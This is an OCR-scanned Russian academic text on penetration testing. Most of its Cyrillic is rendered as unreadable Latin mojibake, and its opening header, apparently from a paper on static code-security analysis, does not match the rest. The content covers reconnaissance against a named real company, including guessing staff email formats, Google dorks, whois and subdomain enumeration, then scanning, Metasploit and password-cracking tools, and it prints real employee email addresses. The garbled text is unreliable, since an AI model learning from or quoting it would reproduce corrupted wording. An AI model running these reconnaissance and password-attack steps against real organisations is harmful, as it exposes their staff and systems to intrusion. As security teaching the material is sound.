3 BPHCTHHECKHH AHAJIH 3 EE 30 I 1 ACH 0 CTM II POrPAMMHO TO 
KORA 

A.C. MapKou^ B.A. MsiiBfieB^ A.A-BJL UitpLiOB 1 


1 Mny hm. H.3. EayuaHu, MoCKsa, FoueimuKaH Oc^cpanEiH 
e-mail: a.maiftov@bmstu.ru- v. a, m a tv e e v@.bm s hi, ni; v.tsirluv@bmstu.nj 

2 HHO "3mundn” s MceKBa, PouuHHUKan <I>eaepamtH 
e-mail: af@cupu.ru 


PaccMompeim vmpyKmypubtu cmamtptecxuu ananas oesanaciioctmt npozpaMMHOzo 
Koda upemenue sadanu o6ecnenemin namomhi tipo&oduMbix npo&epoK. JJ.-wpeanusa- 

PncyHOK 3 - /JeTeiajiM a^pecoB aneKTpOHHOH nonTbi coTpyzjHHKOB 


IIpeflnojiaraeM, hto noHTOBbiH a^pec Ha aomchc «@npo-echelon.ru» 
<J)opMHpyeTca aHajiorHHHO. J\n% npoBepKH npeflnono^ceHHa (})0pMHpyeM 3anpoc 
b noHCKOBHKe (pncyHOK 4). 


Google 


"a.markov@npo-echelon.ru" 


$ Q. 


Bee Hoboctm Bn,qeo KapTWHKH KapTbi Eme HacTpowKM MHcrpyMeHTbi 


PeaynbTaTOB: npuMepHo 21 (0,66 ceK.) 

ripuMeHeHne MeTOfla CTaTMMecKoro cumaiypHoro aHann3a Ana ••• 
https://cyberleninka.ru > HaynHbie CTan>n > ABTOMamKa. BbiMMcnmenbHafl TexHMKa 
aBTop: HB MeflBefleB - 2012 - UumpyeTca: 4 - noxowMe CTarrbu 

yflK 681.3.06. Poccmb, MITy mm. H.3. EayMaHa Poccua, r. MocKBa, 3AO «HnO « 3 wenoH» 
mail@cnpo.ru a.markov@npo-echelon.ru a.fadm@npo-echelon.ru 


PncyHOK 4 - IlpOBepKa padonero noHTOBoro a^peca 

/taa noHCKa no (JmSuoB Ha aomchc opraHH3auHH, co,n,ep3KamHx 3aronoBOK 
«AK-BC» h HMeiOH],Hx pacnmpeHHe PDF Hy>KHO cc|)opMHpoBaTb 3anpoc 
«site:“npo-echelon” filetype:pdf intitle:AK-BC» (pncyHOK 5). 

Google 


site^'npo-echelon.rui 1 filetype:pdf intitle:AK-BC 




Bee KapTHHKM Bn ago Hoboctu KapTbi Euje HacrpotfiKM MHcrpyweHTbi 


PeaynbTarros: 4 (0,33 ceK.} 

[PDF] AK-BC aHanHsarop SesonacHOCTU KOfla . . . - Hno GiuenoH 
https://n po-echelon . nu/com mon_files/.. .11 1 peaen TaL(Ma_flo po$eee%20A. B ._S IE M. pdf ▼ 

L|eHTp no CM, Cn n CO. / OpraH no aTTecrapnM OCTOK Pocchu / OpnaH no cep™4>MKaL|MH ffcCTCK 
POCCHH. 4 ATTeCTaUMOHHblil MBHTp M'HH 06 opOHbJ ... 


[PDF] 3amma MoSmibHbix ycTpcMcrs c noMOiLUbK) epeflere flOBepeHHOfi... 
https://n po-echelon . nu/com mon files/.. ./n peaemaiuMflEaey p hh %20B .H . . pdf ▼ 

SaiAMia MoGunbHbix yciponcTB c nowombio opeflCTB flOBepeHHon sarpyaKn. Ba/iepnu EaSypuH. 
PyKOBOAbuenb npoeicra ... 


AK-BC aHajinaarop 6c3onacHocrn KOfla nporpaMMHbix cmctcm 
https://n po-echelon . nu/com mon_f West .. Jr I pesemaiuMflJM nxafmoea%20E .A. . pdf 
Ha TeppnTopnfo PO HeoGxqqHMO nepenocnib To/ibno 6aay nepcoHanbHbtx flaunbix. Boo MT- 
MHcfjpacTpyKTypy, ynacTByK>LuyK> b npouecce wx o6pa6oTKM ... 


[PDF] AK-BG aHamisarop SesonacHOCTM KOfla nporpaMMHbix cm ere m 
https://n po-ecdelon . nu/com monfiles/.. JU peaeHTainMfl_CaBHeH ko% 20B . B .. pdf ▼ 
npoeeAenne aHannaa yfl3BHMOcreH b cootbstctbwh c HOBbiMM TpeGoeaHMflMH ^CTOK Poccnn. 
CaBMeHKO B.B. Page 2. 2. OnncaHne npo6neMain«n. 


PncyHOK 5 - ITohck no (jjannaM Ha aomchc opraHH3an,HH 
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nojiyneHHH crnicKa 3aKpbm>ix HH^eKcauHH noncKOBHKaMH 

^HpeKTopHH, Heo6xofl,HMO OTKpbiTb (J)aHji «robots.txt» ,3,jia ero nojiyneHHJi b 
a^pecHOH CTpoxe h)okho bbccth https://npo-echelon.ru/robots.txt (pncyHOK 6). 

User-agent! MJL2bot 
Disallow? / 

User-agent: * 

Disallow? /bitrix/ 

Disallow? /adir.in/ 

Disallow t /up 1 o ad/ 

Disallow? /irag/ 

Disallow? /rss/forum.kz/ 

Crawl-delay? B # 3QflQeT TflfiMCiyT 3 0 CeKyHfl 


PncyHOK 6 - CnncoK 3aKpbiTbix n,Ji?i HH^eKcaitHH noncKOBHKaMH 

AUpeKTOpUH 

aHanH3a camn Ha npe^MeT npe^biayutHx Bepcnii Heobxo^HMO 
Boenojib30BaTbca eepBHCOM «waybackmachine.org» (pncyHOK 7). 



M 


PncyHOK 7 - AHann3 Ha npe^MeT npe^bi^yninx Bepcnii caiiTa 

nojiyneHHB HH^opMapHH o ^omchc HeobxoflHMO b kohcojih unix- 
cncTeMbi 3anycTHTb yTHJiHTy «whois» c IP-a^pecoM h ^OMeHHbiM hmchcm caiiTa. 
IP-a/ipec onpeflejMeTca nyreM 3anycxa KOMaH^bi «ping» (pncyHOK 8-9). 
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[MacBook-Pro:- vladimirS ping npo-echelon.ru 
PING npo-echelon.ru (92,53,126,205): 56 data bytes 
64 bytes from 92.53.126.205: icmp^scq=0 ttl=54 time=7,869 ms 
A C 

- npo-echclon.ru ping statistics - 

2 packets transmitted, 1 packets received, 50.09£ packet loss 
round-trip min/avg/max/stddev = 7,069/7,669/7,669/0.000 ms 
[MacBook-Pro:- vladimirS whois 92.53.126,205 
% I ANA WHOIS server 

% for more information on IANA, visit http://www.iana.org 
% This query returned 1 object 


refer: 


whois.ripe.net 


inetnum: 92,0.0.0 - 92,255.255,255 

organisation: RIPE NCC 
status: ALLOCATED 


whois: 


whois,ripe,net 


changed: 2007-03 

source: IANA 


% This is the RIPE Database query service, 

% The objects are in RPSL format. 

% 

36 The RIPE Database is subject to Terms and Conditions. 

% See http: //www, ripe,net/db/support/db-terms-conditions.pdf 


% Note: this output has been filtered. 

% To receive output for a database update, use the "-B" flag. 


% Information related to '92.53,126.0 - 92.53.127,255' 


% Abuse contact for '92.53,126.0 - 92,53,127,255' is 'abuseOtimeweb.ru' 


inetnum: 

netname: 

descr: 

country: 

admin-c: 

tech-c: 

status: 

mnt-by: 

created: 

last-modified: 

source: 


92,53,126,0 - 92.53.127,255 
TimeWeb-12 

TimeWeb shared hosting 
RU 

TNWB-RIPE 

TNWB-RIPE 

ASSIGNED PA 

TINEWEB-NNT 

2014-04-15T06:46:00Z 

2014-04-15T06:46:00Z 

RIPE 


role: 

address: 

address: 

address: 


TimeWeb Co. Ltd. Role Account 
22A,Zastavskaya str. 

196064, Saint-Petersburg 
Russia 


phone: 

phone: 

phone: 

abuse-mailbox: 

admin-c: 

tech-c: 

tech-c: 

tech-c: 

tech-c: 

nic-hdl: 

mnt-by: 

created: 

last-modified: 

source: 


-+7 812 2441081 

+7 495 6041081 

■+G 800 3331061 

abuseOtimeweb.ru 

AAB215-RIPE 

AA6215-RIPE 

NARR-RIPE 

IM3126-RIPE 

SVV280-RIPE 

TNWB-RIPE 

TIMEWEB-MNT 

2008-03-18T10:36:42Z 

2018-02-20T11:50:26Z 

RIPE # Filtered 


PncyHOK 8 - 3anycK yrararra «whois» c IP-a^pecoM 
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MacBook-Pro:- vladimirS whois npo-cchclon.ru 
% IANA WHO I S server 

% for more information on IANA, visit http://www.iana.org 
% This query returned 1 object 


refer: whois.tcinet.ru 

domain; RJ 


organisation: 
address; 
address: 
address; 


Coordination Center for TLD RJ 
G Marta street 1, bid 12 
Moscow 1270G3 
Russian Federation 


contact: 
name; 

organisation: 
address: 
address; 
address; 
phone: 
fax-no; 
e-mail: 


administrative 

.RJ domain Administrative group 
Coordination Center for TLD RJ 
G Marta street 1, bid 12 
Moscow 1270G3 
Russian Federation 
■+7 495 730 29 71 
+7 495 730 29 6G 
ru-admQcctld.ru 


contact: 

name; 

organisation; 
address: 
address: 
address: 
phone: 
fax-no; 
e-mail: 


technical 

Technical Center of Internet 
Technical Center of Internet 
G Marta street 1, bid 12 
Moscow 1270G3 
Russian Federation 
+7 495 730 29 59 
■+? 495 730 29 6G 
ru-techQteinet.ru 


nserver: 
nservcr: 
nserver: 
nserver: 
nserver: 
ds-rdata: 


A. DNS.RIPN.NET 193,232.12G.6 2001:676:17:@:193:232;12G:6 

B. DNS.RIPN.NET 194,05.252.62 2001:676:16:0:194;G5:252;62 

D. DNS.RIPN.NET 194.190.124.17 2001;67G;10:0:194;190;124:17 

E. DNS.RIPN.NET 193.232.142.17 2001;67G;15;0;193;232;142;17 

F. DNS.RIPN.NET 193.232.156.17 2001:670: 14 :0:193;232:156:17 

33094 G 2 722GD0DCEGE4DEDA575C7DD69CDF55C43FCCC4DD60FDCC717DDADED1D1733BE1 


whois : 


whois.tcinet,ru 


status; ACTIVE 

remarks: Registration information; http://www.cctld.ru/en 


created: 1994-04-07 
changed: 2017-10-03 
source; IANA 


% By submitting a query to RIPN's Whois Service 
% you agree to abide by the following terms of use; 

% http: //www. ripn.net/about/servpol.html#3.2 (in Russian) 

% http://www.ripn.nct/about/en/servpol.html#3.2 (in English), 


domain; 
nserver: 
nserver: 
state: 
org: 

registrar: 
admin-contact; 
created: 
paid-till: 
frce-date: 
source: 


NPO-ECHELON,RU 
dnsl,yandex.ru. 
dns2,yandex,ru. 

REGISTERED, DELEGATED, VERIFIED 

JSC NPO Echelon 

R01-RU 

https://partner.r@l.ru/contact_admin,khtml 

2007-02-0GT21:00:0@Z 

20i9-02-0GT21:00:00Z 

2019-03-12 

TCI 


Last updated on 201G-03-19T09:06:34Z 


PncyHOK 9 - 3anycK ymjiHTbi «whois» c AOivieHHbiM hmchcm caiiTa 

aBTOMaTH3HpOBaHHoro noncKa cy6,a,0MeH0B opraHHsauHH 
ycTaHaBjiHBaeM yTHUHTy Sublist3r cornacHO HHCTpyKi],HH 
(https://github.com/aboul31a/Sublist3r) u 3anycKaeM ee c yica3aHHeM AOMCHa 
(pHCyHOK 10). 
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/_I _ _l l__ I (_)_I LI_/_ 

\_M I I I M I / —I __l l_ M 1 _I 

_) I LI I L) I I \ I_) I I 

I_/ \__,_L.__/I_LI_A_I_/LI 

# Coded By Ahmed AbouL-ELa - GabouL3La 

[-] Enumerating subdomains now for npo-echeLon .ru 

[-] Searching now in Baidu.. 

[-] Searching now in Yahoo.. 

[-] Searching now in Google.. 

[-] Searching now in Bing.. 

[-] Searching now in Ask.. 

[-] Searching now in Netcraft.. 

[-] Searching now in DNSdumpster.. 

[-] Searching now in Virustotal.. 

[-] Searching now in ThreatCrowd.. 

[-] Searching now in SSL Certificates.. 

[-] Searching now in PassiveDNS.. 

[!] Error: Google probably now is blocking our requests 
[--] Finished now the Google Enumeration ... 

[-] Saving results to file: Listnpo.txt 

[-] Total Unique Subdomains Found: B 

www .npo-eche Lon .ru 

maiL .npo-eche Lon.ru 

oborona.npo-echelon.ru 

oboronal .npo-eche Lon .ru 

prj.npo-eche Lon .ru 


PiicyHOK 10 - 3anycK yrajiHTBi Sublist3r 

TaKHM 06pa30M, HCIIOJIB3y5I HH<j)OpMaLi;HK) TOJIBKO OTKpBITBIX hctohhhkob, 
yzjajiocB ycTaHOBHTB hma noHTOBoro ^OMeHa KOMnaHHH, HMeHa cySflOMeHOB 
KOMnaHHH, cnoco6 ^opMHpoBaHHa a^pecoB paSoneH iiohtbi coTpy^HHKOB. 
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3 CKAHHPOBAHHE 


Co6paB Ha npe^tiflymeM 3Tane HH(J)opMau,HK) o pejieBOH opraHH3au;HH H3 
OTKpBITBIX HCTOHHHKOB, HCCJie,Zl,OBaTejIb 6e30naCH0CTH nepeXOflHT KO BTOpOMy 
3Tany - Henocpe^CTBeHHOMy nojiyneHmo HHcjjopiviaHHM ot BHyrpeHHHx ceTeBbix 
cepBHCOB peneBOH opraHH3au;HH. Ecjih Ha npejibijiyiHeM 3Tane flencTBHa 
HcejieflOBaTejia 6e3onacHOCTH 6biJio npaxTHnecxH HeB03M0>KH0 o6Hapy>KHTb hh 
oflHHM H3 H3BecTHbix HHCTpyMeHTOB, Hcnonb3yeMbix b pejiax npejiOTBpameHHa 
aTax, to Ha 3Tane cxaHHpOBafflia, Kor^a H/jeT o6pam,eHHe k cepBHcaM HanpaMyio, 
aKTHBHOCTb flocTaTOHHO jierKO 3aMeTHTb. Ecjih nocTaBJieHHOH 3a^aHeH aBJiaeTca 
npoBe^eHne ayzjHTa HHcjjopiviaHMOHHOM cncTeMbi thkhm o6pa30M, hto6bi 06 stom 
He y3Haa nepcoHaji o^ejia HT, to BCTaeT Bonpoc coKpbiTHa Hcnojib3yeMoro IP- 
a^peca c noMo m bio Hcnojib30BaHHa pa3JiHHHbix npoxcH-cepBepOB hjih 
cneu,HajiH3HpOBaHHoro nporpaMMHoro odecneHeHna. 

3.1 CKaHHpoBaHHe nopTOB 

CKaHHpoBaHHe nopTOB nBjiaeTca caMbiM nepBbiM 3TanoM axTHBHOH 
pa3Be^KH h, noHcajiyn, o^hhm H3 ochobhbix. /JaHHbiH MeTOfl no3BOJiaeT BbiHBHTb 
aKTHBHbie ManiHHbi, padoTaiomne b cera u,ejieBOH opraHH3au,HH, a TaK>xe 
ycTaHOBjieHHoe Ha hhx nporpaMMHoe oSecneneHMe, 3anymeHHbie ceTeBbie 
cepBHCbi h, b HexoTopbix cjiyHaax, Bepcnio onepaijHOHHOH cncTeMbi. 
CKaHHpoBaHHe TCP-nopTOB ocHOBaHO Ha «TpexcTopoHHeM py ko no>xaTHH» 
(three-way handshake). CxaHep nocbmaeT naxeT SYN Ha cxaHHpyeMbm nopT h 
b cjiynae, xor^a nopT OTKpbiT, nojiynaeT b otbct naxeT ACK, a ecjra nopT 3axpbiT 
— naxeT RST. CxaHHpoBaHHe UDP-nopTOB HMeeT cboio oeodeHHOCTb, Tax xax 
npOTOxon UDP, b OTJiHHHe ot TCP, He rapaHTHpyeT Ha,a;e}KHOH .zjocTaBKH 
HH^opMariHH h He Hcnonb3yeT «pyxono>xaTHH». Ecjih npn cxaHHpOBaHHH 
odHapyxcHBaeTca, hto nopT 3axpbiT, cxaHep nojiynaeT Ha3a^ coodmeHne «nopT 
HeflocTyneH». B cboio onepe^b, OTcyrcTBHe Taxoro coodipeHmi no3BOJiaeT 
cxaHepy npHHaTb pemeHHe o tom, hto nopT OTxpbiT. Ho Tyr ecTb o^na 
npodjieMa: ecjra nepeji cepBepoM ctoht SpaH^Mayap, xoTOpbiii SjioxnpyeT 
HAyujHe ot cxaHepa 3anpocbi, to cxaHep He 6yn,eT nojiynaTb cooGmeHHe o 
HeyaanHOM no^KjiiOHeHHH h npHMeT HeBepHoe pemeHHe o tom, hto nopT 

OTKpbiT. 

3.2 Onpenejiemie aKTHBHbix xoctob 

Onpe^ejieHHe aKTHBHbix xoctob noMoraeT coxpaTHTb Bpeivia, xoTopoe 
TpeSyeTca jijih npOBefleHHa ayzjHTa. OnpeaejiHB axTHBHbie xoctbi h 
CKOHpeHTpHpOBaBHIHCb TOJIbKO Ha HHX, HCCJieflOBaTeJIb 6e30naCH0CTH MO^CeT 
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caKOHOMHTb dojibinoe KonHHecTBO BpeMCHH h yMeHbiiiHTb o6beM pa6oTbi. ^jia 
onpeaejieHHa aKTHBHbix xoctob MoacHO Hcnojib30BaTb KOMaHay ping. 

Ping — CTaH^apTHaa yTHjiHTa, KOTopaa bxo^ht b cocTaB jiio6oh OC. 
O^HaKo y aaHHoro MeToaa ecTb oami HeaocTaTOK — oneHb nacTO ICMP, Ha 
ocHOBe KOToporo h pa6oTaeT ping, 3a6jioKHpoBaH Ha ypoBHe dpaHaMayapa. H b 
3tom cjiynae xoct, Ha KOTOpbiii OTnpaBJiaiOTca 3anpocbi, He 6yaeT Ha hhx 
OTB enaTb. 

IIocKOJibKy ping oSnaaaeT aocTaTOHHO orpaHHneHHOH 
(l)yHKHHOHajibHOCTbK), Bflo6aBOK Hcnojib3yeTca yranHTa hping3, KOTopaa 
pa6oTaeT He tojibko c ICMP, ho h c TCP-npOTomnoM, cjieaoBaTejibHO, OHa 
MoaceT OTnpaBaaTb 3anpocbi Ha jiio6oh nopT, nojiynaTb otbctbi h o6pa6aTbiBaTb 

HX. 


3.3 IIojiyHeHHe iiH(J)opMauiiii ot DNS-cepnepa 

Ejiaroaapa HH^opMapHH, KOTopyio MoacHO nojiyHHTb ot DNS-cepBepa, 
MoacHO cocTaBHTb cnncoK nySaHHHbix BHeniHHX, a nopon h BHyrpeHHHX 
cepBepOB, Hcnoab3yeMbix peneBoii opraHH3au;HeH. EteaHMoaeiicTBOBaTb c DNS- 
cepBepOM MoacHO HecKOJibKHMH pa3JiHHHbiMH cnocoSaMH, HanpHMep, nepe3 
KpoccnaaTcjiopMeHHyFO ymjiHTy nslookup. 

Tnnbi 3anHceii, ucnojibsyeMbix DNS-eepBHCOM: 

• A (Address) — CBa3biBaeT aoMeimoe hmb h IP-aapec; 

• SOA (Start of Authority) — noica 3 biBaeT, Kaicne DNS OTBenaiOT 3a 
3TajiOHHyio HH^opMapmo o ^aHHOH 30He; 

• CNAME (Canonical Name) — aonojiHHTejibHoe HMa ana aaHHoro 
aoMeHa; 

• MX (Mail Exchange) — onpeaenaeT, KaKue noHTOBbie cepBepbi 
odcjiyacHBaiOT aaHHyio 30Hy; 

• SRV (Service) — noica3biBaeT, KaKue eepBHCbi odcjiyacHBaiOT 
aaHHyio 30Hy (HanpHMep, cepBepbi aKTHBHoii anpeKTOpHH); 

• PTR (Pointer) — npHBa3biBaeT IP-aapec k aoMeHHOMy hmchh; 

• NS (Name Server) — noKa3biBaeT, KaKiie DNS-cepBepbi 
odcayacHBaiOT aaHHyio 30Hy. 

Hcnoab3ya HH(J)opMau,Hio H3 sthx 3anHceii, MoacHO nojiynuTb mhoto 
nOJie3HOH HH(J)OpMaiI,HH. 
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4 nOHCK H 3KCIUiyATALI,HH YJI3BHMOCTEH 


HTaK, Han^eH cepBep, k KOTopoMy Moamo noayHMTb AOCTyn. OObihho Ana 
HeCaHKU,HOHHpOBaHHOrO nO^KJIIOHeHHa HCnOJIB3yiOT ya3BHMOCTH B 
ycTaHOBJieHHOM nporpaMMHOM oSecneneHHH. IIohck ya3BHMOCTeii Moaoio 
ocymecTBJuiTB BpyuHyio, ncnonb3ya nojiyneHHyio HHC^opMapmo h 6a3bi AaHHbix 
ya3BHMOCTeii. O^HaKO 3 to oneHb Aonraii h TpyaoeMKHH npopecc. A Moamo 
BOcnojib30BaTbca cxaHepaMH ya3BHMOCTeii. CaMbie nonyaapHbie H3 hhx — 
Nessus, OpenVAS, Retina h Nexpose. Ohh no3BonaioT He TOJibKo HaxoAHTb 
OTKpbiTbie ya3BHMOCTH b ycTaHOBJieHHOM nporpaMMHOM o6ecneneHHH h 
onepau,HOHHbix CHCTeMax, ho h onpeAenaTb ycTapeBrnne npoTOKOJibi 
HiH(J)pOBaHHa, 3apa>reHHbie KOMnbiOTepbi h MHoroe Apyroe. OpenVAS bxoaht b 
cocTaB Kali Linux. 

Kali Linux aBaaeTca nepeAOBbiM Linux-AHCTpHOymBOM Ana npoBeAeHHa 
TecTHpOBaHHH Ha npOHHKHOBeHHe h ayAHTa 6e3onacHOCTH. Kali BKaionaeT 6onee 
600 HHCTpyMeHTOB, OpHeHTHpOBaHHbIX Ha pa3JIHHHbie 3aAaHH HH^OpMapHOHHOH 
6 e3onacHOCTH, TaKHe xax TecTHpoBaHHe Ha npOHHKHOBeHHe, c6op HHcjiopMauHH, 
<J)opeH3HKa h oSparaaa HHaceHepna. Kali Linux pa3pa6aTbiBaeTca, 
4)HHaHCHpyeTca h noAAepacHBaeTca Offensive Security, aHAHpyiomeH 
KOMnaHHeii b ccj)epe oSynemia HH^opiviauHOHHOM 6e3onacHOCTH. B KauecTBe 
ochobbi Ana C03AaHHB Kali Linux 6bm BbiOpaH pacnpocTpaHeHHbiH AHCTpuSymB 
- Debian, hto AenaeT ero Hcnonb30BaHHe npocTbiM AJia umpoKoro Kpyra 
nojib30BaTeneH Ubuntu, Knoppix h Apyrnx AHCTpn6yTHBOB, ocHOBaHHbix Ha 
Debian. 

Bee AencTBHa, npOBOAHMbie Ha a^hhom 3Tane b xoAe npoBeAeHHa 
TecrapOBaHHa Ha npOHHKHOBeHHe, MoryT 6biTb 3aMeneHbi aAMHHHCTpaTOpaMH 
peneBOH CHCTeMbi. Ecjih 3to caynHTca, to ohh HaBepHaxa nonpo6yiOT noMemaTb 
npoBeAeHHio AanbHenniHx achctbhh. 

/l,jia pa3pa6oTKH, TecTHpOBaHHa h npnMeHeHHa SKcnaonTOB 6biJia co3AaHa 
nporpaMMHaa naaT(|)opMa Metasploit Framework. 

OKcnaoHT — 3to cnepnajibHaa nporpaMMa, ncnonb3yioiii;aa H3BecTHbie 
ya3BHMOCTH b nporpaMMHOM oSecneneHHH Ana npoBeAeHHa aTaKH c peabio 
nojiyneHHa KOHTpojia HaA CHCTeMoii wm BbiBOAa ee H3 CTpoa (oTKa3a b 
o6cayacHBaHHH). OKcnaoHTbi ObiBaiOT yAaaeHHbiMH, paOoTaioiuHMH nepe3 
KOMnbiOTepHyK) ceTb, h jiOKanbHbiMH, 3anycKaion],HMHca HenocpeACTBeHHO b 
caMoii CHCTeMe. B Metasploit 3KcnjiOHTbi AenaTca Ha aKTHBHbie h naccHBHbie. 
AKTHBHbie HauHHaiOT 3KcnayaTHpoBaTb onpeAeneHHyio ya3BHMOCTb b 
nporpaMMHOM obecneneHHH cpa3y ace nocae 3anycKa h 3 aKanHBaiOT cboio 
paSoTy b cjiynae ypauH nan npoBaaa. IlaccHBHbie acAyT noAKaioneHna 
yAaaeHHoro xocTa n ToabKO nocae 3Toro HauHHaiOT cboio paSoTy. HanpnMep, 
MoacHO 3anycTHTb 3KcnaonT, OTnpaBHB acepTBe KaneHTCKyio nacTb no 
aaeKTpOHHOH noure. ITocae Toro, KaK noaynaTeab OTKpoeT npnaoaceHne k 
nncbMy, KaneHTCKaa nacTb coeAHHHTca c 3anyiueHHbiM paHee SKcnaoifroM, h tot 
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Ha^HeT aTaicy. IIpocMOTpeTb Bee .zjocTynHbie 3 KcruiOMTbi mojkho, Hcnojib3ya 
KOMaH^y show exploits, o^waKO, yHHTbiBaa hx orpoMHoe koumhcctbo, 3to He 
Bcer^a ya,o6HO. 

Metasploit aBjiaeTca yHHBepcajibHbiM HHCTpyMeHTOM fljia npOBe^eHHB 
ayzjHTa 6e3onacHOCTH. ^aHHbiii (J)peHMBOpK nocToaHHO noAAep>KHBaeTCH h 
oSHOBJiaeTca. OcHOBHaa pa6oTa c 6ecnnaTHOH BepcneH npOHCxo^HT nepe3 
KOMaH^HbiH HHTep^eSc c Hcnojib30BaHHeM msfconsole. O^Haico, cymecTByeT h 
rpa<J)HHecKHH nHTep^ehc Armitage. 

Metasploit coctoht H3 a^pa, KOTOpoe oSecnenHBaeT coBMecTHyio paSoTy 
cne^yiomHx no^KmonaeMbix komhohchtob: 

1. HHTep(j)eHCbi: KOHCOJibHbm h rpa^HnecKHe; 

2. Mo^yjiH: 

- 3KcnjioiiTbi (o6ecneHHBaiOT bo3mo^choctb 3KcnjiyaTai],HH 
Haii^eHHOH ya3BHMOCTH); 

- nojie3Haa Harpy3Ka (nporpaMMa, KOTopaa 3anycKaeTca nocae 

ycneniHOH pa6oTbi 3KcnjiOHTa h BbinojiHaeT nepeflejieHHyio (jjyHKLtnio, 

HanpHMep, co3flaHHe nojib30BaTejia, OTKpbiTHe nopTa h t. 

- BcnoMoraTejibHbie MOflyjiH (cicaHep nopTOB, nepeSop napoaeS, 
aHaaH3 Tpac[)HKa h t. 

- 3HKOfl,epbI (n03B0JMK)T CKpbITb Bpe,Zl,OHOCHbIH KOfl, OT CHCTeM 
3ani,HTbi nyreM ero MHoroKpaTHoro npeo6pa30BaHHa) h t. 

3. paciiiHpeHHa — no3BOJiaiOT 3HaHHTejibHO pacnmpHTb (JjyHKpHOHaji 
Metasploit. 
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5 IIAPOJIbHME ATAKH HA PA3JIHHHBIE CEPBHCbl 


no yMOJiqaHHK) napa jiorHH h napojib Hcnojib3yeTca AJia ayreHra(|)HKaii,HH 
bo Bcex CHCTeMax. EyAb to BeO-npHjionceHHe, onepauHOHHaa CHCTCMa hjih 6a3a 
flaHHbIX. 

CymecTByeT Ana ochobhbix MeTO^a aTaic Ha napojiH. Ha caMOM AeJie 
cyinecTByeT mho'/Kcctbo cnoco6oB B3JiOMa napojiH, ho Bee ohh — 3to b 
ochobhom MOAH(J)HKaLi,HH jih6o npaMoro nepeOopa, jih6o nepeOopa no cnoBapio. 

1. nepe6op napojieii. Ha3BaHne MeTo^a roBopHT caMO 3a ce6a: b AaHHOM 
cjiynae aTaicyiomHil npocTO noAOnpaeT napojib. BHanajie, HanpHMep, 
nepeOnpaiOTCJi Bee uncjipbi ot 0 ao 9, 3aTeM ot 10 ao 99, ot 100 ao 999 h t. a- 
BpyHHyFO noAoOpaTb napojib tbkhm cnocoOoM He npe^CTaBjiaeTca B03M0HCHbiM, 
AJih 3toto Hcnojib3yiOT cneiuiajibHoe nporpaMMHoe oOecneneHHe, KOTopoe mbi 
paccMOTpHM nyra no3>Ke. 

2. ATaKH no cnoBapio. CyTb MeTO^a 3aKJnonaeTCH b tom, hto araxyiomHil 
noflOnpaeT napojib He cuynaimbiM o6pa30M, a 6epeT cnoBa H3 3apaHee 
noflroTOBJieHHoro (l)aiijia c napojixMH. Pa3yMeeTca, nepeOop, xax h b 
npe^bi^ymeM cjiynae, He BeAeTCu BpynHyio. 

Oafiji c napojMMH mo>kho Hailra b HHTepHeTe. Ho nocicojibKy oneHb nacTO 
nonb30BaTejiH Hcnojib3yiOT ajiji co3AaHmi napojieii Ha3BaHne CBoeil npo(J)eccHH, 
AaTy po'/K^eHHH hjih Ha3BaHHe opraHH3au,HH, to b HeKOTOpbix cjiynaax 
eaMOCToaTejibHO C03AaHHbiil cnncoK napojieii 6yn,eT HaMHoro jiynrne Han^eHHbix 
b HmepHeTe. 

Pa3yMeeTca, C03AaTb BpynHyio cnncoK xoth 6bi H3 1000 napojieii — 
3afl,ana aobojibho ejio^CHaa. CymecTByiOT cnoco6bi aBTOMara3aii,HH stoto 
npopecca. HanpHMep, yrajiHTa Crunch, BxoAamau b cocTaB Kali Linux. OHa 
MOHceT reHepnpOBaTb cnncKH cjiob, ocHOBbiBaucb Ha 3ajjaHHbix nojib30BaTejieM 
npaBHJiax. 

HanpHMep, 3Ha r nojiHTHKy 6e3onacHOCTH KOMnaHHH xotb 6bi b 
OTHomeHHH napojieii, mojkho co3Aara cnncoK H3 CTpox, co^ep^camHx, 
HanpHMep, fleBUTb chmbojiob, OAHy 3arjiaBHyio 6yKBy h OAHy un^py. 

BTopoil cnoco6 C03jjaHHn coOctbchhoto, nepcoHajiH3HpOBaHHoro cnncKa 
napojieii — 3 to Hcnojib30BaHHe cjiob h (J>pa3 c caiiTa opraHH3an,HH. Run AaHHoii 
u,ejiH mo>kho Hcnojib30BaTb HHCTpyMeHT noA Ha3BaHneM cewl, KOTopbiil Taioice 
bxoaht b cocTaB Kali Linux. 

napojiH pe^KO xpaHBTca b otkpbitom BMAe, b noAaBjiaioiueM OojibiHHHCTBe 
ohh 3anHcaHbi b BHAe xerneil. Xem — pe3yjibTaT paOoTbi (J)yHKH,HH, 
npeo6pa3yK)meH BxoAHbie AaHHbie b CTpoxy onpeAeJieHHoil ajihhbi. Xeura 
napojieii xpamiTCx b (fiaiijiax h 6a3ax AaHHbix. H3 xerna Hejib3u nonyuHTb napojib, 
TOJibKO nepeOopoM moikho noAoOpara napojib c TaKHM >xe xerneM. flna pa3Hbix 
napojieii He MoaceT cymecTBOBaTb OAHHaKOBbix xerneil (b coBpeMeHHbix 
ajiropHTMax). J^jih nepeOopa hco6xoahmo BHanajie ycTaHOBHTb ran anropHTMa, 
c noMOiubio KOTOporo nojiyneH AaHHbiil xem. Bee 3to AOJiaeTca c 
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Hcnojib30BaHHeM cneipiajibHoro IIO, HanpnMep, John the Ripper. TaicKe pjra 
3thx pejieii mo^cho ncnojib30BaTb papy>KHbie Ta6jiHu,bi. 

Paay>KHbie Ta6jmpbi - 3to 3apaHee paccwramibiH Ha6op paHHbix, 
KOTOpblH COaep>KHT Xem-(J)yHKLI,HH H3 MHO/KCCTBa KOM6HHapHH 6yKB H U,H(J)p. 
Ecjih 3HaneHHe xenxjiyHKpHH H3BecTHO, to b Ta6jinpe oneHb 6biCTpo mo>kho 
HaiiTH cooTBeTCTBytomnn napoab. 

IlpeflnocbiJiKaMH co3paHHa papy^Hbix TaSjiup aBJiaeTca nocTpoeHiie 
penoneK B03M0>KHbix napojieii. B Hanajie Ka^Kpoii OTpejibHon penonKH ecTb 
cjiynaSHbiH napoab, pajiee penonKa nopBepraeTca pencTBHio xem-cjiyHKpHH n 
4)yHKu,HH penpopyKpHii. 3Ta cjiyHKpHa npeo6pa3yeT pe3yjibTaT xem-^yHKpnn b 
HeKOTopbin B03M0»cHbra napoab. IlpOMe^cyTOHHbie napojin b penonxy He 
coxpaHaiOTca, a b TaSjinpy 3aHoeaTca tojibko nepBbiii h nocjiepHHH aaeMeHTbi 
penoneK. 

Ta6jiHpbi npepocTaBjiaiOT pocTyn tojibko k toh xem-(J)yHKpHH, pjia 
KOTOpOH OHH C03paBajIHCb. 


22 



6 CPE^CTBO TECTHPOBAHHfl 3KCIIJIOHTOB 

METASPLOITABLE 2 

